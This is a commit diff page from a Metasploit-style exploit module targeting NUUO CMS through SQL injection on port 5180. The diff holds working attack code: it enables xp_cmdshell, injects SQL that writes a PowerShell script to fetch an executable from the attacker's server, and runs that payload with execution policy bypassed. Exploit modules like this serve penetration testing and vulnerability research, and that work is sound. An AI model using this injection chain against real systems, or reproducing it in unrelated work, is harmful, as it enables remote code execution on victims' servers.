Skip to content

Commit 4a4637d

Browse files
jrobles-r7jrobles-r7
committed
Move execute shell
1 parent 2e28ffe commit 4a4637d

File tree

1 file changed

+6
-22
lines changed

1 file changed

+6
-22
lines changed

modules/exploits/windows/nuuo/nuuo_cms_sqli.rb

Lines changed: 6 additions & 22 deletions
Original file line numberDiff line numberDiff line change
@@ -44,11 +44,7 @@ def initialize(info={})
4444
'Privileged' => false, # we run as NETWORK_SERVICE
4545
'DisclosureDate' => 'Oct 11 2018',
4646
'DefaultTarget' => 0))
47-
register_options(
48-
[
49-
Opt::RPORT(5180),
50-
OptInt.new('SLEEP', [true, 'How long to wait for the payload download', '15']),
51-
])
47+
register_options [Opt::RPORT(5180)]
5248
end
5349

5450

@@ -68,8 +64,10 @@ def on_request_uri(cli, request)
6864
return
6965
end
7066
print_good('Sending the payload to CMS...')
71-
@exe_sent = true
7267
send_response(cli, @pl)
68+
69+
print_status('Executing shell...')
70+
inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""), true)
7371
end
7472

7573
def create_hex_cmd(cmd)
@@ -89,7 +87,6 @@ def exploit
8987
end
9088

9189
@pl = generate_payload_exe
92-
@exe_sent = false
9390
resource_uri = "/#{rand_text_alpha(8..16)}"
9491

9592
#do not use SSL
@@ -112,29 +109,16 @@ def exploit
112109
# we need to roll our own here instead of using the MSSQL mixins
113110
# (tried that and it doesn't work)
114111
print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
115-
filename = "#{rand_text_alpha_lower(8..10)}.exe"
112+
@filename = "#{rand_text_alpha_lower(8..10)}.exe"
116113
download_pl = %{xp_cmdshell }
117114
download_pl << %{'cd C:\\windows\\temp\\ && }
118115
download_pl << %{echo $webclient = New-Object System.Net.WebClient >> wget.ps1 && }
119116
download_pl << %{echo $url = "#{service_url}" >> wget.ps1 && }
120-
download_pl << %{echo $file = "#{filename}" >> wget.ps1 && }
117+
download_pl << %{echo $file = "#{@filename}" >> wget.ps1 && }
121118
download_pl << %{echo $webclient.DownloadFile($url,$file) >> wget.ps1 && }
122119
download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1'}
123120

124121
print_status('Injecting PowerShell payload')
125122
inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
126-
127-
counter = 0
128-
while (not @exe_sent || counter >= datastore['SLEEP'])
129-
Rex.sleep(1)
130-
counter += 1
131-
end
132-
133-
unless @exe_sent
134-
fail_with(Failure::Unknown, 'Could not get CMS to download the payload')
135-
end
136-
137-
print_status('Executing shell...')
138-
inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{filename}\""), true)
139123
end
140124
end

0 commit comments

Comments
 (0)